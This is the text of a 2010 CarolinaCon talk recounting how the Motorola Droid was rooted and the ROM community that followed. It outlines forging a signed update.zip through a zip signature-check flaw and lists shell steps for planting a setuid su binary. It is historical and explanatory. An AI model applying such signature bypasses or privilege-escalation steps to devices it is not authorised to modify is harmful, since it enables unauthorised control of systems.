Eclair’s Creamy Center:
How The Droid Was Rooted
Michael Goffin
CarolinaCon 2010
Can you hear me now?
• RIT Graduate 2006
• Computer Science House Alumni
• Hack or Halo and ShmooCon staff
• member of 0x90 and DroidDev
What we’ll cover
• Definitions
• Rooting timeline
• Post-rooting progress
• How to root your phone
Definitions
Droid
Definitions
• Droid Specs:
• CDMA dual band (800/1900 MHz); CDMA2000 1xRTT/1xEV-DO
rev.0/1xEV-DO rev.A
• 3.7-inch screen with 854×480 (16:9 widescreen) capacitive
touchscreen
• 5 megapixel camera with autofocus and LED flash and video
recording
• 600 MHz ARM Cortex A8 Processor (underclocked to 550)
• 256 MB RAM / 512 MB ROM
• 16G microSD
• GPS, Wi-Fi, 3.5mm HeadPhone Jack
• Talk Time: 420 minutes
• Standby Time: 450 hours
Definitions
• AOSP
• Android Open Source Project
• Odex
• Java VM on Android is a Dalvik VM (designed
for processor/memory-constrained devices)
• consumes DEX files (Java files rendered by DX)
• files loaded into VM then classes optimized by
dexopt
• Optimization results in an ODEX’d file
• Deodex
• de-odexing a file to hack on the code
• done using deodexerent
Why root the Droid?
• Overclocking
• Installing apps which require escalated privileges
• Theming
• Wireless tethering
• Backported apps from other Android devices
(Milestone, Nexus One, etc.)
• Control over OTA updates
• Mixing and matching featuresets from different
Android versions
Key Dates
• Release of Droid - 11/6
• Finding official 2.0.1 update.zip - 12/7
• First root - 12/8
• First local root - 12/8
• Simplified rooting process - 12/9
• Custom Payload Instructions - 12/10
• Official OTA Rollout of 2.0.1 – 12/11
Where we started
• A small group of us met on
www.droidforums.net in early November
• Created a private IRC channel, Google
Waves, and reached out to other sites
• www.alldroid.org
• forum.xda-developers.com
• started looking for potential exploits
Where we started
• [mbm] found this gem in the Android
source:
verifier.c – this section is a signature check to verify everything from
the start to the eocd which marks the end of the update.zip file
for (i = 4; i < eocd_size-3; ++i) {
if (eocd[i ] == 0x50 && eocd[i+1] == 0x4b &&
eocd[i+2] == 0x05 && eocd[i+1] == 0x06) {
// if the sequence $50 $4b $05 $06 appears anywhere after
// the real one, minzip will find the later (wrong) one,
// which could be exploitable. Fail verification if
// this sequence occurs anywhere after the real one.
LOGE("EOCD marker occurs after start of EOCD\n");
fclose(f);
return VERIFY_FAILURE;
BONUS NUGGET!
• For those interested in the patch that was
eventually submitted to Google:
Commit:
https://review.source.android.com/#change
,12807
Diff:
https://review.source.android.com/#patch,s
idebyside,12807,1,verifier.c
Where we started
• Waiting game for the official update.zip to
come out so we can work with it
• [mbm] to the rescue!!
https://android.clients.google.com/updat
es/voles/signed-voles-ESD56-fromESD20.84263456.zip
Game on
• Zinx Verituse used the official update.zip
to craft a custom update.zip using the
exploit
• The goal was to create an update.zip that
the phone would accept as a standard
update file, but inject an su binary to gain
root access
Game on
• Process involves (30k’ view):
1. Create a non-zip file of all 0’s the same size as the
update.zip (donor file)
2. Building a payload zip file
3. Concatenate payload to non-zip into an update.zip file
4. Adjust offsets
5. Append signature from donor to end of your
update.zip
6. For any file you want from donor copy out the relevant
hex
7. Use dd to take the donor in and out it to your
update.zip
Game on
• The detailed process can be found here:
http://alldroid.org/threads/13908-Craftingyour-own-update-zip-payload
• Zinx wrote Volez to make this easier:
http://zenthought.org/content/project/vole
z
First Root Posted
• Zinx posted the first root to
www.alldroid.org
http://alldroid.org/viewtopic.php?f=236&t=
567
• first root process gave us root through
ADB shell
• required plugging into a computer
First Local Root Posted
• Same day, I posted instructions for getting
local root on the phone without the need
for a computer
• Goal was to get access for developers to
start porting their “root required” apps in
the Google Market to the Droid
First Local Root Posted
• Process involves (again, 30k’ view):
1. Root droid using Zinx’ process
2. Download a special su binary used in previous Android
rooted installs
3. Use ADB to push su binary to /data/local/ (writable
user folder)
4. Remount /system on the phone to be rw
5. `mv /system/bin/su /system/bin/osu`
6. `cat /data/local/su > /system/bin/su`
7. `chmod 6755 /system/bin/su`
8. Run `sync` then `reboot`
End result is being able to execute `su` from a terminal
emulator directly on the phone
First Local Root Posted
• Detailed, but outdated instructions can be
found here:
http://alldroid.org/viewtopic.php?f=210&t=
572
Simplified Rooting Process
• Easier process was posted the day after:
• update.zip was fitted with special su
binary and Superuser.apk from Cyanogen to
manage applications attempting to use
escalated privileges
Enter Sholes.info group!
• original group from IRC with some other
developers from other sites created
www.sholes.info
• Sholes was the codename of the Droid
• yes, we hosted http://as.sholes.info
• goal was to start customizing the phone
and continuing exploit research for when
Google patched
Enter Sholes.info group!
• First project released: sprecovery
• modified recovery to replace the one
currently on the Droid
• would allow us to easily run custom
updates, ROMs, and other changes into
the phone off of the SD card
• written by SirPsychoS
Enter Sholes.info group!
• Second project: SholesMod
• custom ROM installed using sprecovery
• custom kernel modifications
• ported applications
• shell enhancements
• developed and tested by all of the
SholesMod group
Enter Sholes.info group!
• Third project: SMUpdater
• app put in the Google Market
• automated the downloading of latest
ROM versions onto SD card and installing
• will install sprecovery, root the phone,
and install the ROM
• written by Camel
• put in market for $5 as a donation to
the team, but also put on site for free
• $25k in 2-3 weeks
Enter Sholes.info group!
• Group continued backporting
• Focus shifted to overclocking
• Released ROM with 600/800/1000mHz
• Configured using SetCPU app through
Market
• Added AdamZ’s Smoked Glass theme
• Backported 2.1 applications
• 2.1 is still not officially released as of
writing this, but sounds like 3/19
Breaking News!!
[Verizon] spokesperson Thomas Pica said in
an email [on 3/18], "The Android 2.1
upgrade for the Droid by Motorola was
deployed to a small number of Verizon
Wireless test users as scheduled. It is
expected the broader phased rollout to all
Droid by Motorola users will take place, but
not just yet. No date scheduled yet."
http://www.phonescoop.com/news/item.php?n=567
6
There Goes Sholes.info group!
• Issues arose within sholes.info and the site
and source was taken down by server
owner
• Luckily we were using Mercurial so we
all had source
• Another great reason to use a
distributed SCM!
• Group decided to refund everyone their
money from purchasing the app and move
forward with a free app, and site donation
only
Enter DroidMod group!
• SMUpdater was discontinued
• New site http://droidmod.org
• New members joined to increase
bandwidth and support for increased
demand
• Camel created DMUpdater 1.0
• Group created a new ROM to go out with
1.0
• more apps backported
• Download from site only until we can get
it in the Market
Using DroidMod
Using DroidMod
Using DroidMod
Using DroidMod
Using DroidMod
Using DroidMod
Using DroidMod
More on the DroidMod group
• Open IRC channel on freenode: #droidmod
• Moved from Mercurial to git
• Currently working on compiling the 2.6.32
kernel for the Droid
• New DroidMod coming soon!
What others are doing
• Lots of ROMs coming out with custom
themes, kernels, apps, etc.
• Overclocking exceeding 1200/1300
• Koush recently ported Cyanogenmod from
the Nexus over to the Droid
• 360 degree rotation
Summary of URLs
AOSP: http://source.android.com/
AOSP Git Repo: http://android.git.kernel.org/
Forums:
http://www.alldroid.org
http://www.droidforums.net
http://forum.xda-developers.com
http://forum.droidmod.org
Committed patch for exploit:
https://review.source.android.com/#change,12807
Diff: https://review.source.android.com/#patch,sidebyside,12807,1,verifier.c
Guessed URL for update:
https://android.clients.google.com/updates/voles/signed-voles-ESD56-fromESD20.84263456.zip
Creating update.zip: http://alldroid.org/viewtopic.php?f=286&t=626
First root process: http://alldroid.org/viewtopic.php?f=236&t=567
First local root process: http://alldroid.org/viewtopic.php?f=210&t=572
Credit where it’s due
[mbm] - finding original exploit in code, guessing update URL that
made this possible
Zinx Verituse - put together original update.zip payload, and tool, and
posted the first rooting
Cyanogen - Superuser.apk
mjxg - local root
SirPsychoS - recovery mod
koush - Cyanogen mod ported to Droid
Camel - Original SholesMod Updater and new DroidMod Updater
Contributors to DroidMod and advancement of the droid hacking
community:
[mbm], SirPsychoS, humancyborg, m0nkee, mjxg, Orgg, Randomcity,
trevorj, angel12, birdman, Camel, forkup, planb, unicron, votetrev,
vulcan, xeudoxus, gandhip, Ronen, visbits, electrofunk, koush, takeda
Thank you
Slides will be available on my website:
www.mgoff.in